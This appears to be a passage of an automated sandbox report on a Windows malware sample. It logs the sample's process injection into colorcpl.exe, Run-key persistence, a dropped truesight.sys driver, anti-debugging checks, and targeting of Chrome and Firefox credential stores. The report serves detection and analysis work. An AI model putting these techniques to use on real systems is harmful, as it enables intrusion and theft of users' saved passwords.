              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ???.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??l.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: tquery.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: advapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: spp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppwmi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: slc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppcext.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winscard.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: devobj.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021AB1000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172985786.0000000021A82000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2310644496.0000000000798000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match | File source: 0.2.MeP66xi1AM.exe.2b30000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000003.2115600641.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2193478070.0000000002317000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.2115096749.000000007FD80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B487A0 LoadLibraryW,GetProcAddress,FreeLibrary | 0_2_02B487A0
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5C2FC push 02B5C367h; ret | 0_2_02B5C35F
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B332FC push eax; ret | 0_2_02B33338
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3635A push 02B363B7h; ret | 0_2_02B363AF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3635C push 02B363B7h; ret | 0_2_02B363AF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5C0AC push 02B5C125h; ret | 0_2_02B5C11D
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5C1F8 push 02B5C288h; ret | 0_2_02B5C280
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5C144 push 02B5C1ECh; ret | 0_2_02B5C1E4
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B486C0 push 02B48702h; ret | 0_2_02B486FA
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3673E push 02B36782h; ret | 0_2_02B3677A
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B36740 push 02B36782h; ret | 0_2_02B3677A
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3C4F4 push ecx; mov dword ptr [esp], edx | 0_2_02B3C4F9
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4E5B4 push ecx; mov dword ptr [esp], edx | 0_2_02B4E5B9
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3D528 push 02B3D554h; ret | 0_2_02B3D54C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3CB74 push 02B3CCFAh; ret | 0_2_02B3CCF2
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B5BB6C push 02B5BD94h; ret | 0_2_02B5BD8C
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3CB56 push 02B3CCFAh; ret | 0_2_02B3CCF2
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B47894 push 02B47911h; ret | 0_2_02B47909
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B468D0 push 02B4697Bh; ret | 0_2_02B46973
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B468CE push 02B4697Bh; ret | 0_2_02B46973
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4A920 push 02B4A958h; ret | 0_2_02B4A950
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B48916 push 02B48950h; ret | 0_2_02B48948
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4A91F push 02B4A958h; ret | 0_2_02B4A950
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B48918 push 02B48950h; ret | 0_2_02B48948
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B42EE8 push 02B42F5Eh; ret | 0_2_02B42F56
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B45E04 push ecx; mov dword ptr [esp], edx | 0_2_02B45E06
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B42FF4 push 02B43041h; ret | 0_2_02B43039
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B42FF3 push 02B43041h; ret | 0_2_02B43039
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04ADB4FD push esi; ret | 5_2_04ADB506
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8008C push es; iretd | 5_2_04A8008D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A800D8 push es; iretd | 5_2_04A800D9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AD42E6 push ecx; ret | 5_2_04AD42F9

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | File created: C:\Users\Public\Libraries\Wnbcdrjt.PIF
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | File created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | File created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A863C6 ShellExecuteW,URLDownloadToFileW | 5_2_04A863C6
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | File created: C:\Users\Public\Libraries\Wnbcdrjt.PIF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A98AC3 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 5_2_04A98AC3
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wnbcdrjt
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_02B4A95C
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2B30000 memory commit 500006912
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2B31000 memory commit 500178944
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2B5C000 memory commit 500002816
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2B5D000 memory commit 500199424
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2B8E000 memory commit 501014528
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2C86000 memory commit 500006912
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: 2C88000 memory commit 500015104
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2C70000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2C71000 memory commit 500178944
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2C9C000 memory commit 500002816
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2C9D000 memory commit 500199424
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2CCE000 memory commit 501014528
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2DC6000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Memory allocated: 2DC8000 memory commit 500015104
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8E18D Sleep,ExitProcess | 5_2_04A8E18D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 5_2_04A986FE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Window / User API: threadDelayed 9779
              Source: C:\Windows\SysWOW64\colorcpl.exe | API coverage: 8.0 %
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7068 | Thread sleep time: -615000s >= -30000s
              Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7068 | Thread sleep time: -29337000s >= -30000s
              Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B358B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA | 0_2_02B358B4
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A887A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 5_2_04A887A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A9A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 5_2_04A9A01B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 5_2_04A8B28E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 5_2_04A8838E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 5_2_04A8AC78
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A868CD FindFirstFileW,FindNextFileW | 5_2_04A868CD
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A87848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 5_2_04A87848
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A97AAB FindFirstFileW,FindNextFileW,FindNextFileW | 5_2_04A97AAB
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 5_2_04A8AA71
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04ACBA59 FindFirstFileExA,5_2_04ACBA59
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04A86D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04A86D28
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.0000000000816000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: colorcpl.exe, 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
              Source: Wnbcdrjt.PIF, 00000007.00000002.2315649260.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr\
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeAPI call chain: ExitProcess graph end nodegraph_0-29019
              Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_5-94067
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFAPI call chain: ExitProcess graph end nodegraph_7-26938
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent | 0_2_02B4EBF0
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_04AB27AE
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B487A0 LoadLibraryW,GetProcAddress,FreeLibrary | 0_2_02B487A0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AC07B5 mov eax, dword ptr fs:[00000030h] | 5_2_04AC07B5
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068D1117 mov eax, dword ptr fs:[00000030h] | 5_2_068D1117
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_068D1117 mov eax, dword ptr fs:[00000030h] | 5_2_068D1117
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0691157A mov eax, dword ptr fs:[00000030h] | 5_2_0691157A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A90763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError | 5_2_04A90763
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB27AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_04AB27AE
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB2D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_04AB2D5C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB98AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 5_2_04AB98AC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB28FC SetUnhandledExceptionFilter | 5_2_04AB28FC

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 68D1656
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 68D0000
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 5_2_04A90B5C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A975E1 mouse_event | 5_2_04A975E1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AB29DA cpuid | 5_2_04AB29DA
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA | 0_2_02B35A78
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: GetLocaleInfoA | 0_2_02B3A798
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: GetLocaleInfoA | 0_2_02B3A74C
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA | 0_2_02B35B84
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW | 5_2_04ACF4F3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 5_2_04ACF61C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 5_2_04ACF7F0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW | 5_2_04ACF723
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW | 5_2_04ACF130
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW | 5_2_04ACF17B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 5_2_04ACF2A3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA | 5_2_04A8E2BB
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW | 5_2_04ACF216
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 5_2_04ACEEB8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW | 5_2_04AC5E1C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW | 5_2_04AC5914
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA | 7_2_02C75A78
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: GetLocaleInfoA | 7_2_02C7A798
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA | 7_2_02C75B83
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B39194 GetLocalTime | 0_2_02B39194
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A995F8 GetUserNameW | 5_2_04A995F8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04AC66BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free | 5_2_04AC66BF
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B3B714 GetVersionExA | 0_2_02B3B714
Source: C:\Windows\SysWOW64\colorcpl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4570116894.0000000002AD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 5_2_04A8A953
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 5_2_04A8AA71
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db | 5_2_04A8AA71

              Remote Access Functionality

